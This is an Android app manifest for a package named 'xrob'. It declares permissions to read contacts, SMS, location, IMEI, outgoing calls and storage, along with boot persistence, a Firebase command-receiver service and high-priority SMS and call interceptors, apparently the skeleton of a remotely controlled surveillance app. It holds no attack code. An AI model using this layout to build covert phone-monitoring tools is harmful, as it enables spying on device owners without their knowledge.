<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.theah64.xrob">

    <uses-permission android:name="android.permission.GET_ACCOUNTS" />
    <!-- What? -->
    <uses-permission android:name="android.permission.INTERNET" />
    <!-- To execute contact listener -->
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <!-- To read contacts -->
    <uses-permission android:name="android.permission.READ_CONTACTS" />
    <!-- To execute upload -->
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <!-- To read IMEI -->
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <!-- To get username -->
    <uses-permission android:name="android.permission.READ_PROFILE" />
    <!-- To launch activity -->
    <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" />

    <!-- TODO: Dir - NOT YET -->
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />

    <!-- To get phone location through TelephonyManager -->
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />

    <!-- To get SMS -->
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />

    <!--To set wallpaper-->
    <uses-permission android:name="android.permission.SET_WALLPAPER" />

    <application
        android:name=".utils.Xrob"
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:supportsRtl="true"
        android:theme="@style/AppTheme">
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <service android:name=".services.ContactsWatcherService" />

        <receiver android:name=".receivers.BootCompleteReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>
        <receiver android:name=".receivers.NetworkChangeReceiver">
            <intent-filter android:priority="9999">
                <!--TODO Got to fix this warning-->
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
            </intent-filter>
        </receiver>

        <service android:name=".services.firebase.CommandReceiverService">
            <intent-filter>
                <action android:name="com.google.firebase.MESSAGING_EVENT" />
            </intent-filter>
        </service>

        <service android:name=".services.firebase.InstanceIdService">
            <intent-filter>
                <action android:name="com.google.firebase.INSTANCE_ID_EVENT" />
            </intent-filter>
        </service>

        <receiver android:name=".receivers.OutgoingCallReceiver">
            <intent-filter android:priority="9999">
                <action android:name="android.intent.action.NEW_OUTGOING_CALL" />
            </intent-filter>
        </receiver>

        <service
            android:name=".services.FileWalkerService"
            android:enabled="true"
            android:exported="true"
            android:permission="android.permission.READ_EXTERNAL_STORAGE" />

        <!--To receive SMS-->
        <receiver
            android:name=".receivers.SMSReceiver"
            android:exported="true">
            <intent-filter android:priority="1000">
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>


    </application>

</manifest>